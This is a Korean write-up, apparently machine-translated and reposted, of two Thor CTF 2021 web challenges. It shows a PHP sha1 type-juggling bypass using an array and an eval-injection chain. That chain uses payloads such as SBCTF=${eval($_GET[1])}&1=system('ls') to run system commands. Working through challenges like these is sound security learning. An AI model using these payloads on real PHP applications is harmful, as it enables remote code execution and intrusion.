Thor CTF 2021

Thor 2021 CTF
나는 웹 문제 두 개와 OSINT 문제 한 개를 풀었다.
웹 질문을 기록하는 writeup.
Web
Tricks 1
질문 페이지

해법
php에서 sha1 함수의 규격을 확인하십시오.
https://www.php.net/manual/ja/function.sha1.php
반환 값은 문자열로 sha1 해시 값을 반환합니다.이런 기록이 있다.
그렇다니까.
다음은 문자열을 제외하고, 예를 들어 sha1 함수에 수조를 전달하려고 시도할 때 어떤 일이 일어날까요?

<?php
    $ex=[1,2,3];
    echo gettype($ex);
    echo sha1($ex);
?>

위 코드의 실행 결과:

array

sha1 함수의 반환 값이 없습니다.
데이터 유형을 확인합니다.

<?php
    $ex=[1,2,3];
    echo gettype($ex);
    echo gettype(sha1($ex));
?>

arrayNULL

NULL에게 응답했습니다.
여기는 검증이 없습니다.md5도 마찬가지입니다.
배열을 보내면 Flag를 획득할 수 있을 것 같습니다.

Flag 획득!
Phpbaby
문제.
루트 디렉토리에서 Flag 가져오기
※ 문제문을 읽을 수 없기 때문에 진정한 문제문은 다르지만, 어감은 같다.
질문 페이지

해법
HTML 소스를 확인합니다.

<!-- Access To Source Code Is Not Allowed! -->

<!DOCTYPE html>
<html>
<head>
    <title>lettercrap.js demo</title>
    <script src="/cdn-cgi/apps/head/xnSNotsdYPTd4Qn38KNoSYKvO4k.js"></script><script src='lettercrap.js'></script>
    <link rel='stylesheet' href='lettercrap.css'/>
    <style>
    body {
        text-align: center;
        font-family: sans-serif;
    }
    p {
        max-width: 60%;
        margin: auto;
    }
    [data-letter-crap] {
        margin: auto;
        margin-top: 3em;
        margin-bottom: 5em;
    }
    </style>
</head>
<body>

    <div data-letter-crap='SBCTF.png' data-lettercrap-words='CTF PHP eval robots' style='width: 70%' data-lettercrap-aspect-ratio='0.3'></div>
</body>
</html>

eval, 로봇스 등의 단어를 찾을 수 있습니다.
힌트입니다.
robots.txt 확인해봐.

user-agent: *
disallow: /Source_Code_Backup

/Source_Code_백업에 접근하면 일부 원본 코드를 확인할 수 있습니다.

<!--
// Source Code Backup:
$SBCTF=@(string)$_GET['SBCTF'];
filter($boycott, $SBCTF);
eval('$SBCTF="'.addslashes($SBCTF).'";');
-->

eval을 이용하여 시스템 명령을 호출하면 Flag를 얻을 수 있습니다.
변수 확장를 사용하면 임의의 함수를 실행할 수 있습니다. 아래 코드를 입력하십시오.

SBCTF=${phpinfo()}

잘 나왔어.
시스템 함수를 계속 실행하려고 시도합니다.

나 욕 먹었어.필터에 맞은 것 같아.
이 필터는 $SBCTF의 값만 확인했기 때문에 다음 코드로 시스템 함수를 실행해 보십시오.
eval로 묶은 건...GET의 변수 전개가 원활하지 않기 때문이다.eval로 묶어서 변수로 식별됩니다.

SBCTF=${eval($_GET[1])}&1=system('ls');

순조롭게 진행되었다.
루트 디렉터리를 보면 Flag이 있어요.

참조:
https://0xalwayslucky.gitbook.io/cybersecstack/web-application-security/php
감상
해결된 웹 문제는 php 지식을 묻는 문제가 되었다
해답하는 과정에서 php 처리 함수에 대한 이해를 깊이 있게 했다.
또 조사할 때PaizaCloud는 매우 편리하다.
간단하게 환경을 준비할 수 있어서 너무 좋아요...

Reference

이 문제에 관하여(Thor CTF 2021), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://qiita.com/daihi_t/items/f370a9a8541518ba5e29

텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.

우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)

좋은 웹페이지 즐겨찾기

개발자 우수 사이트 수집

개발자가 알아야 할 필수 사이트 100선 추천 우리는 당신을 위해 100개의 자주 사용하는 개발자 학습 사이트를 정리했습니다